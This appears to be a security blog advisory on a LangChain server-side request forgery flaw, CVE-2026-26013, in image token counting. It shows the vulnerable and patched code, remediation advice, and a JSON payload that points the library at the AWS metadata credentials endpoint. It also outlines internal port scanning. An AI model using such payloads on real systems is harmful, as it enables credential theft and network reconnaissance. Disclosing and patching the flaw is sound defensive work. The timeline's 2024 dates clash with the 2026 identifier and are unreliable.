CVE-2026-26013

CVE-2026-26013: When Your AI Assistant Browses Your Intranet

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 11, 2026·6 min read·6 visits

Executive Summary (TL;DR)

LangChain's `ChatOpenAI` component contained an SSRF vulnerability in its token counting logic. To estimate costs for vision models, the library automatically fetched images from URLs provided in prompts. This allowed attackers to force the server to request internal resources (like AWS metadata or localhost). Fixed in `langchain-core` 1.2.11.

In the race to build the ultimate AI agent, developers often overlook the plumbing. CVE-2026-26013 is a classic Server-Side Request Forgery (SSRF) vulnerability nestled deep within LangChain's utility functions. Specifically, the logic used to calculate token costs for OpenAI's vision models inadvertently turned the library into an open proxy. By tricking the `ChatOpenAI` component into 'measuring' an image hosted on an internal server, attackers could force the application to scan local networks or ping cloud metadata services. It’s a stark reminder that even 'helper' functions need to treat user input like a biological hazard.

The Hook: The Price of Pixels

In the modern LLM economy, tokens are currency. Developers are obsessed with counting them before sending requests to OpenAI to avoid bankruptcy. Text is easy—just count the subwords. But images? Images are tricky.

OpenAI's GPT-4o and GPT-4-turbo vision models price images based on their dimensions. A 512x512 image costs fewer tokens than a 2048x2048 one. To help developers estimate these costs locally, LangChain introduced a convenience method: get_num_tokens_from_messages().

Here is the logic: If a user sends a prompt with an image URL, LangChain grabs the image, checks the height and width, and calculates the token cost. It sounds helpful, benign even. But from a security perspective, it's a nightmare. The library was effectively saying, "Give me a URL, and I will make a server-side HTTP request to it." In the security world, we call this a 'feature' right up until it becomes a CVE.

The Flaw: Blind Trust

The vulnerability (CWE-918) stems from a lack of boundary checks in the _url_to_size helper function. When you pass a message history to the token counter, LangChain iterates through it. If it spots a type: image_url, it extracts the URL and immediately fires an HTTP GET request.

There was no whitelist. There was no blacklist. There was no check to see if the IP resolved to 127.0.0.1 or the infamous 169.254.169.254 (cloud metadata). The code assumed that if you are asking to count tokens for an image, you must be pointing to a valid, public image.

This is a classic blind SSRF scenario. While the attacker might not get the content of the response back (because the code tries to parse the response as an image using Pillow), the side effects are dangerous enough. The server performs the handshake, sends the headers, and downloads the body. This allows an attacker to map internal ports (based on response time), trigger internal APIs that act on GET requests, or perform Denial of Service by pointing the tokenizer at a 10GB file.

The Code: Autopsy of a Request

Let's look at the vulnerable code path in libs/partners/openai/langchain_openai/chat_models/base.py. The logic was devastatingly simple. It used httpx to fetch the resource without hesitation.

Vulnerable Implementation:

def _url_to_size(image_source: str) -> tuple[int, int] | None:
    # No validation. Just fetch.
    response = httpx.get(image_source)
    response.raise_for_status()
    # Pass bytes to Pillow to get dimensions
    return Image.open(BytesIO(response.content)).size

The fix, introduced in commit 2b4b1dc29a833d4053deba4c2b77a3848c834565, is a lesson in defensive programming. The maintainers didn't just add a regex; they introduced a dedicated security module langchain_core._security._ssrf_protection.

Fixed Implementation:

from langchain_core._security._ssrf_protection import validate_safe_url
 
def _url_to_size(image_source: str) -> tuple[int, int] | None:
    try:
        # 1. Validate the URL before connection
        validate_safe_url(image_source, allow_private=False, allow_http=True)
        
        # 2. Add timeouts to prevent hanging
        with httpx.Client(timeout=5.0) as client:
            response = client.get(image_source)
            
        # 3. Check content size (50MB limit matching OpenAI)
        # ... (size checks) ...
    except (ValueError, httpx.RequestError):
        return None

The validate_safe_url function does the heavy lifting: it resolves the DNS (preventing DNS rebinding attacks) and checks if the resulting IP falls into private ranges (RFC 1918) or loopback addresses.

The Exploit: Poking the Bear

Exploiting this requires an application that allows user-controlled message history or uses an agent that processes external content. Imagine a "Receipt Scanner AI" that accepts image URLs.

The Attack Vector:

  1. Reconnaissance: The attacker identifies that the backend is using LangChain by analyzing error messages or behavior (e.g., precise token counts returned in debug logs).
  2. Payload Construction: The attacker crafts a request pretending to provide an image, but actually pointing to the AWS metadata service.
{
  "messages": [
    {
      "role": "user",
      "content": [
        {"type": "text", "text": "Analyze this receipt"},
        {
          "type": "image_url", 
          "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
        }
      ]
    }
  ]
}
  1. Trigger: The application calls chat.get_num_tokens_from_messages(messages) to check if the prompt fits the context window.
  2. Execution: LangChain sends a GET request to the metadata IP.
  3. Result:
    • Best Case (for Attacker): The application throws an error containing the response body: Error: cannot identify image file <AWS_CREDENTIALS_BLOB>. This leaks the credentials directly.
    • Blind Case: The application simply errors out or hangs. The attacker repeats this with different ports (localhost:22, localhost:5432) to map the internal network topology based on response latency.

The Impact: Why Low Severity Still Hurts

The CVSS score is 3.7 (Low) primarily because the Confidentiality impact is rated None/Low depending on the specific implementation. Since the function expects an image, it usually discards non-image data (like JSON from a metadata service) before the attacker sees it.

However, do not let the "Low" severity fool you. In a cloud environment, SSRF is a gateway drug. If an attacker can trigger requests from your backend, they can:

  1. Bypass Firewalls: Access internal admin panels (e.g., Jenkins, Kubernetes API) that are whitelisted for the server's IP.
  2. Cloud Enumeration: Even blind SSRF can confirm the existence of specific IAM roles or instance configurations.
  3. Denial of Service: By pointing the URL to a resource that returns an infinite stream of data (like /dev/urandom exposed over HTTP), they can exhaust the memory of the Python process attempting to load it into BytesIO.

The Fix: Locking Down the Library

Remediation is straightforward but urgent. You must update langchain-core to version 1.2.11 or higher. The patch includes robust SSRF protections that are enabled by default.

If you cannot upgrade immediately, or if you are paranoid (which you should be), you can disable this behavior entirely in your code:

# explicitly disable fetching
token_count = chat.get_num_tokens_from_messages(
    messages, 
    allow_fetching_images=False
)

This flag forces LangChain to skip the download and use a default/fallback calculation for token usage, preventing the network request altogether. It makes your token counts slightly less accurate for images, but it keeps your internal network private. A worthy trade-off.

Fix Analysis (1)

Technical Appendix

CVSS Score
3.7/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Probability
0.04%
Top 89% most exploited

Affected Systems

LangChain Framework (Python)Applications using `ChatOpenAI` with vision modelsInternal networks accessible by LLM servers

Affected Versions Detail

Product
Affected Versions
Fixed Version
langchain-core
LangChain AI
< 1.2.111.2.11
AttributeDetail
CWE IDCWE-918
Attack VectorNetwork
CVSS v3.13.7 (Low)
ImpactBlind SSRF, Internal Scanning
Vulnerable Methodget_num_tokens_from_messages
Fix Commit2b4b1dc29a833d4053deba4c2b77a3848c834565
CWE-918
Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) occurs when a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination.

Vulnerability Timeline

Patch Commit Merged
2024-05-21
Advisory Published
2024-05-22

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.